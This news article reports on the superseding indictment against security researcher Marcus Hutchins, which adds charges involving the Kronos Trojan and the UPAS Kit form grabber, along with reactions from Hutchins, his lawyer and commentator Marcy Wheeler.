The court saga of Marcus Hutchins, a security researcher from England also known as MalwareTech, will continue after a superseding indictment filed by the U.S. government added new charges to his case.
Hutchins was originally arrested in August 2017 on charges of creating and distributing the Kronos banking Trojan. The superseding MalwareTech indictment, filed on Wednesday, adds four new charges to the original six, including the creation of the UPAS kit malware, conspiracy to commit wire fraud, and lying to the FBI.
Hutchins first gained prominence in May 2017 as one of the researchers who helped slow the spread of the WannaCry ransomware, and he recently mused on Twitter about the connection between that act and the new MalwareTech indictment.
While this all sucks a lot, I can’t stop laughing at the irony of the superseding indictment coming exactly on the 1 year anniversary of me receiving an award for stopping WannaCry.
Hutchins also had strong language to describe the supplemental indictment, but one of his lawyers, Brian Klein was more measured.
@marciahofmann and I are disappointed the govt has filed this superseding indictment, which is meritless. It only serves to highlight the prosecution’s serious flaws. We expect @MalwareTechBlog to be vindicated and then he can return to keeping us all safe from malicious software https://t.co/E1M0qod3CN
The UPAS Kit described in the new filing was a form grabber that Hutchins admitted to creating, but he asserted it was not connected to Kronos. Marcy Wheeler, national security and civil liberties expert, questioned how this was included in the new MalwareTech indictment because of the time frames related to those charges.
The indictment noted that the UPAS Kit was originally sold and distributed in July 2012 and alleged Hutchins developed Kronos “prior to 2014” and supplied it to the individual who sold the UPAS Kit. However, Wheeler pointed out in a blog post that a five-year statute of limitations should apply to such charges, and that even if the government could get around it, Hutchins would have been a minor in 2012 when these actions allegedly took place.
Additionally, Wheeler noted that Hutchins admitted to creating the UPAS form grabber, while denying it was part of Kronos, when the FBI first arrested him. The new MalwareTech indictment claims Hutchins lied to the FBI about creating Kronos, which, given that admission, calls the new false-statement charge into question.